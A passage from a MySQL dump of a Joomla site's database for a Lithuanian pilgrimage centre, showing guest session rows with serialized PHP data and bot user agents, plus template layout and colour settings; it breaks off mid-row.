JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;s:3:\"gid\";i:1;s:5:\"event\";O:8:\"stdClass\":1:{s:13:\"K2UserDisplay\";s:0:\"\";}s:7:\"profile\";N;s:6:\"avatar\";s:46:\"/components/com_k2/images/placeholder/user.png\";}}',0,'',''),('88b0mpa61dcefr0pouopu4n6k1',0,1,'1748591352','__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1748591352;s:18:\"session.timer.last\";i:1748591352;s:17:\"session.timer.now\";i:1748591352;s:22:\"session.client.browser\";s:78:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:340:\"bZDLTsMwEEV/xfIKNo0dpaEaL0Flw2PLrhpitzGJ68h2SqDqvzN5lA1IliyfO+O5dxByOEcogWtzspXh6hU2wJ8/HuYnSLHoDkPTd1xFEMDHSxZj0x77Nu2u4juIUZHAg8H2HxyrYMzx0+pUc2VnnF9xbeyhTr+c5nR2MG3AZP1I5VJtHR7M3geHKXL1QpQsO+tM+urMDNbUiwEdV0h+z5cI5Bad1kvAmPR9izHyOT+Jc2+EuzFVbJKfsv4NfqG/yEOPU/G4K/9t2xaz9UqwmzcpFdsa7QMq9mSP/cCGTbkrC8XCiTZQrMQtezRV47NcSEFHsq0NlGbIJpUG/AA=\";s:6:\"markup\";s:0:\"\";}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";N;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";N;s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'',''),('idmvebjk4h5oh0lb0ab07b00i6',0,1,'1748591135','__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1748591135;s:18:\"session.timer.last\";i:1748591135;s:17:\"session.timer.now\";i:1748591135;s:22:\"session.client.browser\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:332:\"bY/NTsMwEIRfpfIJhJSfilK0vgHXwoEHQJvErU1tHHk3BKjKs7OpUy5wsvzNzu4MwhIOBDegOvPuWqP0E9yC2rw+5C/U1awHTPuhV5qgAjU99fVk2uLg+eUsNlBNSg0qGfT/YGqTMW+j69gq7TJenrE1bmf5l8ud3n0Yn5BdnGg9T7uAO7ONKSCT0o9CJXJwwfBnbzJYiRcTBqVR8h6OBJIWQ9fNBYm7e49EKvcXMXsJ1lMr2nM8df1b/Ci7JMOAp2G5s4lfznssV0W1uGhj6CVu441ePJuQBrJ3kcv1d+P14soy91CW4zgWlMVCDGUTubAc/KVs/wE=\";s:6:\"markup\";s:0:\"\";}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'',''),('sumi5u63pd9vcasn72ghn0f816',0,1,'1748591433','__default|a:7:{s:15:\"session.counter\";i:2;s:19:\"session.timer.start\";i:1748591432;s:18:\"session.timer.last\";i:1748591432;s:17:\"session.timer.now\";i:1748591433;s:22:\"session.client.browser\";s:111:\"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:456:\"nZBRT8IwFIX/StMnSAxsTAZ2TwSjJIAmYsKjKazbLrRr03aKEv677TaMGnkxezo799ze71AyIEdDYoJT9gpbhpNHMiZ4ubttJAmD1hdU7yuFk0bIDXDmRXjtoxmtuH05j2xI4J2QYM0o/+O32WrGyjdIbYETIFFcG4OzUTDIC+ud0bh2AoIVHBjX1IKsE+08CJqzTGpBrcEJJRE5Qv1K5BJl7kfDRu1UrQaNyiHDycl4VAGC2XflYB6cN3Q5qqnwyxy5G3F8VKRpW4yx6ZRTYzAZ+V6c2WR/tfKjL7fzUFjB8Q/69SX62SX6p+/0Nw7JrCqlpLZnzK9G7v7byMkBuyUVbW51xy7lB3BO+8NegDoLKKtDgiZlqiWkKAwSNO+iiVKcrdlmDrY/jEa9KEad+ex5ubhCHPYM3bPtXnbRtNBSsH4Yxb3Af2hZ14VWNKMa2qS74RM=\";s:6:\"markup\";s:6:\"mobile\";}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'',''),('v9aa9p8l7iol433nutntvk6lc2',0,1,'1748590838','__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1748590837;s:18:\"session.timer.last\";i:1748590837;s:17:\"session.timer.now\";i:1748590837;s:22:\"session.client.browser\";s:200:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:548:\"nZBRT9swFIX/iuUnqk1OnJB22E/ANJAgbBqT4G1yaje51K4tx1k7EP99dtIigeBlj8fnnut7PsEK9tSzOcNS/YGlwvw7+8Jw/fB1kozme98Ivx4c5pOwDWiVBD1O0ZUYdPh9GGlYnhzKsFdCv/PcL71Smy3I0GEO7JjSZBQHo1PQdiE5i3J0coYd7JT2IoDFXLKCzItqnwEjWrWy3ojQYy5YyZ5g/KmMqU2b1tBJPbhRFZNqYYX5c5/qGjAq/HWx0E30qpgTXpi0LLaPI7GjMFLu4fRBnmvR95gtEptoTtk3ZF4xizt3XTAavyJw9xGBy48I/HxL4CTW6m8H56wPh6ovVL79L5XnWDouGUS6t8jj77V9BK1FVpEcHV3DZthxdLqR3oJEc5ITytGN2g09qu7R2QBaZnV9Vpz8mKFT57S6U80VhKwqF6Sco6Ory1/19WekYa3QhVqu7Qydd94aldEybVvQvCSUlqgecaJbsRIeXuJLa1wE0WjF0YW1rVaNDVmRjvjUheBYlm23W9KOFonTWfRJ4j+L5f4B\";s:6:\"markup\";s:6:\"mobile\";}s:11:\"com_content\";O:8:\"stdClass\":1:{s:8:\"category\";O:8:\"stdClass\":1:{s:4:\"list\";O:8:\"stdClass\":1:{s:4:\"53:0\";O:8:\"stdClass\":1:{s:5:\"limit\";i:10;}}}}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'','');
/*!40000 ALTER TABLE `xyhmu_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_template_styles`
--

DROP TABLE IF EXISTS `xyhmu_template_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_template_styles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `template` varchar(50) NOT NULL DEFAULT '',
  `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `home` char(7) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_template` (`template`),
  KEY `idx_home` (`home`)
) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_template_styles`
--

LOCK TABLES `xyhmu_template_styles` WRITE;
/*!40000 ALTER TABLE `xyhmu_template_styles` DISABLE KEYS */;
INSERT INTO `xyhmu_template_styles` VALUES (2,'bluestork',1,'1','Bluestork - Default','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\"}'),(3,'atomic',0,'0','Atomic - Default','{}'),(4,'beez_20',0,'0','Beez2 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(6,'beez5',0,'0','Beez5 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"images\\/sampledata\\/fruitshop\\/fruits.gif\",\"sitetitle\":\"Infotytuv\\u0117nai\",\"sitedescription\":\"\",\"navposition\":\"left\",\"html5\":0}'),(7,'shaper_helix_ii',0,'0','shaper_helix_ii - Default','{\"layout_width\":\"1170\",\"layout_type\":\"responsive\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"logo_type_image\":\"\",\"logo_type_text\":\"Helix\",\"logo_type_slogan\":\"Joomla! Templates Framework\",\"logo_width\":\"130\",\"logo_height\":\"50\",\"footer_position\":\"footer1\",\"showcp\":\"1\",\"copyright\":\"Copyright \\u00a9  {year} Shaper Helix - II Demo. All Rights Reserved.\",\"show_helix_logo\":\"1\",\"jcredit\":\"1\",\"credit_link\":\"1\",\"credit_text\":\"Designed by {JoomShaper}\",\"validator\":\"0\",\"showtop\":\"1\",\"totop_position\":\"footer2\",\"preset\":\"preset1\",\"preset1_header\":\"rgb(248, 248, 248)\",\"preset1_bg\":\"#f2f2f2\",\"preset1_text\":\"rgb(102, 102, 102)\",\"preset1_link\":\"rgb(34, 184, 240)\",\"preset2_header\":\"rgb(238, 238, 238)\",\"preset2_bg\":\"rgb(245, 245, 245)\",\"preset2_text\":\"#444\",\"preset2_link\":\"rgb(109, 127, 27)\",\"preset3_header\":\"#e5ddd5\",\"preset3_bg\":\"#f2f2f2\",\"preset3_text\":\"#333\",\"preset3_link\":\"#aa824a\",\"layout\":[{\"name\":\"Header\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"20px 0\",\"children\":[{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"logo\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"6\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"menu\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"search\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Feature\",\"class\":\"container\",\"responsive\":\"hidden-phone hidden-tablet\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"80px 0\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"feature\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Users\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"30px 0\",\"children\":[{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user1\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user2\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user3\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user4\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Main Body\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"30px 0\",\"children\":[{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"left\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"6\",\"offset\":\"\",\"type\":\"message\",\"position\":\"\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\",\"children\":[{\"name\":\"Content Area\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"component\",\"position\":\"\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]}]},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"right\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Breadcrumb\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"breadcrumb\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Bottom\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"40px 0\",\"children\":[{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom1\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom2\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom3\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom4\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Footer\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"30px 0\",\"children\":[{\"span\":\"7\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"footer1\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"5\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"footer2\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]}],\"menu\":\"mainmenu\",\"menutype\":\"mega\",\"menu_col_width\":\"200\",\"show_menu_image\":\"1\",\"menu_image_position\":\"1\",\"submenu_position\":\"0\",\"init_x\":\"0\",\"init_y\":\"0\",\"sub_x\":\"0\",\"sub_y\":\"0\",\"body_font\":\"\",\"body_selectors\":\"\",\"header_font\":\"\",\"header_selectors\":\"\",\"other_font\":\"\",\"other_selectors\":\"\",\"cache_time\":\"60\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"enable_ga\":\"0\",\"ga_code\":\"\",\"loadjquery\":\"0\",\"loadfromcdn\":\"0\",\"lessoption\":\"1\",\"hide_component_area\":\"0\"}'),(10,'tytuvenu_piligrimu_centras',0,'1','tytuvenu_piligrimu_centras - Default','{\"layout_width\":\"1170\",\"layout_type\":\"responsive\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"logo_type_image\":\"\",\"logo_type_text\":\"Helix\",\"logo_type_slogan\":\"JTytuv\\u0117n\\u0173 piligrim\\u0173 centras!\",\"logo_width\":\"428\",\"logo_height\":\"75\",\"footer_position\":\"footer1\",\"showcp\":\"1\",\"copyright\":\"\\u00a9  {year} V\\u0161\\u012f Tytuv\\u0117n\\u0173 piligrim\\u0173 centras\",\"show_helix_logo\":\"0\",\"jcredit\":\"0\",\"credit_link\":\"0\",\"credit_text\":\"Suku \",\"validator\":\"0\",\"showtop\":\"1\",\"totop_position\":\"footer2\",\"preset\":\"preset3\",\"preset1_header\":\"#ffffff\",\"preset1_bg\":\"#fff\",\"preset1_menu\":\"#ffffff\",\"preset1_text\":\"#7d7d7d\",\"preset1_link\":\"#0c7fcf\",\"preset1_footer\":\"#fff\",\"preset2_header\":\"#fff\",\"preset2_bg\":\"#ffffff\",\"preset2_menu\":\"#ffffff\",\"preset2_text\":\"#7d7d7d\",\"preset2_link\":\"#67a926\",\"preset2_footer\":\"#fff\",\"preset3_header\":\"#ffffff\",\"preset3_bg\":\"#fff\",\"preset3_menu\":\"#ffffff\",\"preset3_text\":\"#7d7d7d\",\"preset3_link\":\"#c0392b\",\"preset3_footer\":\"#fff\",\"preset4_header\":\"#ffffff\",\"preset4_bg\":\"#ffffff\",\"preset4_menu\":\"#ffffff\",\"preset4_text\":\"#7d7d7d\",\"preset4_link\":\"#576d83\",\"preset4_footer\":\"#fff\",\"preset5_header\":\"#ffffff\",\"preset5_bg\":\"#ffffff\",\"preset5_menu\":\"#ffffff\",\"preset5_text\":\"#7d7d7d\",\"preset5_link\":\"#1abc9c\",\"preset5_footer\":\"#fff\",\"preset6_header\":\"#ffffff\",\"preset6_bg\":\"#ffffff\",\"preset6_menu\":\"#ffffff\",\"preset6_text\":\"#7d7d7d\",\"preset6_link\":\"#f39c12\",\"preset6_footer\":\"#fff\",\"layout\":[{\"name\":\"Header\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"8\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"logo\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"account\",\"style\":\"none\",\"customclass\":\"pull-right\",\"responsiveclass\":\"\"}]},{\"name\":\"Breadcrumb\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"breadcrumb\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Menu\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"9\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"menu\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"search\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Banner\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"banner\",\"style\":\"sp-xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Slide\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"slide\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Features\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"feature\",\"style\":\"sp-xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Users\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user1\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user2\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user3\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Main Top\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"maintop\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Main Body\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"9\",\"offset\":\"\",\"type\":\"message\",\"position\":\"\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\",\"children\":[{\"name\":\"Component Area\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"component\",\"position\":\"\",\"style\":\"xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]}]},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"right\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Gallery\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"gallery\",\"style\":\"sp-xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"User Bottom\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 